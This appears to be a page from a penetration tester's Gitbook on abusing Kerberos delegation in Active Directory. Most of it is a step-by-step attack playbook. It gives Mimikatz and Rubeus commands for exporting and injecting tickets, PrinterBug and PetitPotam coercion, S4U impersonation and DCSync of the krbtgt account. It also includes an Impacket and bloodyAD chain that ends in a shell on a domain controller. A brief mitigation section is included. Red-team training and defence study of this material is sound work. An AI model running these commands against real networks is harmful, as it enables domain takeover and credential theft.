Trustee and Resource Delegation

Exploiting Delegation

Useful online security tips and articles | F‑Securelabs.f-secure.com

Delegating Like a Boss: Abusing Kerberos Delegation in Active DirectoryGuidePoint Security

Delegations

GitHub - TheManticoreProject/Delegations: A tool to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active DirectoryGitHub

ADeleginator

GitHub - techspence/ADeleginator: A companion tool that uses ADeleg to find insecure trustee and resource delegations in Active DirectoryGitHub

NXC

nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation

https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03

SharpADWS

GitHub - wh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).GitHub

Unconstrained Delegation

Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain

Getting Domain Admin with Kerberos Unconstrained Delegationwww.labofapenetrationtester.com

Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)Active Directory & Azure AD/Entra ID Security

Discovery

PowerView

Get-DomainComputer -UnConstrained

AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect then

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse DA token

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'

Trick a high user to connect to a machine with Unconstrained Delegation ? Printer Bug

Misconfiguration Print Spooler

MS-RPRN abuse (PrinterBug) | The Hacker Recipeswww.thehacker.recipes

Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See Trusts

Capture the TGT of dc$ by using Rubeus on victim server

Rubeus.exe monitor /interval:5 /nowrap

Printerbug - Run MS-RPRN.exe

GitHub - leechristensen/SpoolSample: PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.GitHub

PrecompiledBinaries/SpoolSample.exe at master · jtmpu/PrecompiledBinariesGitHub

MS-RPRN.exe \\dc.domain.local \\vicitm.domain.local

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

Or with PetitPotam

GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.GitHub

.\PetitPotam.exe victim-hostname

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

On Linux, use Coercer

SMB (445, 139) / RPC

ShadowCoerce or DFSCoerce can also be used

GitHub - ShutdownRepo/ShadowCoerce: MS-FSRVP coercion abuse PoCGitHub

GitHub - Wh04m1001/DFSCoerceGitHub

Copy the base64 encoded TGT and remove extra spaces before use it

Rubeus.exe ptt /ticket:<Base64>

Or use Invoke-Mimikatz:

[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",
[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'

Run DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

DCSync

Mitigation

The following security controls should be implemented to mitigate unconstrained delegation:

Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.
Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’. This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.
Ensure privileged user objects are members of the Protected Users security group. Members of this security group cannot be delegated.
Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Constrained Delegation - Protocol Transition

Constrained Delegation: allows the first hop server to request access only to specified computers

Service for User (S4U) used to impersonate a user

S4U2self: allows a forwardable TGS to itself on behalf of a user - TUSTED_TO_AUTHENTICATE_FOR_DELEGATION

S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains a list of SPN to which the token can be forwarded

Discovery

PowerView

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

AD Module

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with kekeo

password or NTLM/AES keys required

Request a TGT

kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>

Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL

Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'

ls \\mssql.domain.local\c$

Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt

ls \\mssql.domain.local\c$

The delegation occurs not only for the specified service but for any service running under the same account. No validation for the SPN specified

With rc4

Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:umssql-hostname cmd.exe

Abusing with kekeo

password or NTLM/AES keys required

Request a TGT

kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>

Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL

Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt

SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence - msDS-AllowedToDelegateTo

Persistence

Resource-based Constrained Delegation

Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active DirectoryShenanigans Labs

(RBCD) Resource-based constrained | The Hacker Recipeswww.thehacker.recipes

Instead of SPNs on msDS-AllowedToDelegatTo on the front end service, access is control by a security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service

The service administrator can configure this delegation whereas for other type SeEnableDelagation privs required - by default only DA

Two privileges needed to abuse RBCD:

Write permissions over the target service
Control over an object which as SPN configured (like admin access do a domain joined machine or ability to join a machine to domain - ms-DS- MachineAccountQuota is 10 by default)

Write Permission

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}

Exploit

Configure RBCD

$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for computerx$

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key and access vicitm as ANY user we want

Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt

winrs -r:victim cmd.exe

With Impacket

L.BIANCHI_ADM is a DA

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName  -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_ldap.ccache                                                                                                  
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
                                                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt

Constrained Delegation - Kerberos Only

Leverage RBCD to abuse Kerberos Only configuration

Enumeration

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -PropertiesmsDS-AllowedToDelegateTo

Create a new machine account

https://github.com/Kevin-Robertson/Powermad

Powermad.ps1 New-MachineAccount -MachineAccount studentcompX

Configure RBCD

# On victim host
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /impersonateuser:administrator /domain:domain.local /ptt /nowrap

# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Get TGS

# Get hash
Rubeus.exe hash/password:P@ssword@123

Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap

Request a new forwardable TGS

Rubeus.exe s4u /tgs:<base67_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousAD FS NextLAPS

Last updated 6 months ago